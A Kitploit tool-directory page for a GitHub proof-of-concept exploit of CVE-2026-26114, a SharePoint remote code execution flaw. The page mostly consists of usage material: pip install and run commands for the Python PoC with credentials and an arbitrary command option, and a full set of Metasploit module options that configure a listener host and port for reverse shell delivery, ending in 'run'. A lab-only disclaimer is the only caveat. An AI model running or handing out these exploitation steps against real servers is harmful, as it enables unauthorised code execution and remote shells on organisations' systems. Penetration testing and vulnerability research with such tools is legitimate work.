Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2026-26114-poc — Proof-of-concept exploit for CVE-2026-26114, a remote code execution vulnerability in Microsoft SharePoint, with a Python PoC and Metasploit module for automated exploitation and reverse shell delivery. | Kitploit
Tools/GitHubGitHub/huynambka/cve-2026-26114-poc
Exploit FrameworksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubhuynambka/cve-2026-26114-poc

cve-2026-26114-poc

Proof-of-concept exploit for CVE-2026-26114, a remote code execution vulnerability in Microsoft SharePoint, with a Python PoC and Metasploit module for automated exploitation and reverse shell delivery.

23922 months agoReviewed by Kitploit
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-26114

Use only in labs or authorized testing systems.

Python PoC

root@kitploit:~
pip install requests requests-ntlm

python poc/cve_2026_26114_rce.py ^
  --target http://sharepoint.local ^
  --username sp_user1 ^
  --password "Password123!" ^
  --domain SP19 ^
  --cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"

You can use --proxy http://127.0.0.1:8080, --insecure, or replace --cmd with --marker-file C:\Windows\Temp\marker.txt.

Metasploit module

Module located at:

root@kitploit:~
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb

Example options:

root@kitploit:~
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run

If not using auto-discovery, set these additionally: TAXONOMY_STORE_ID, TAXONOMY_GROUP_ID, SITE_ID, WEB_ID, JOB_CREATOR_ID.

Download Tool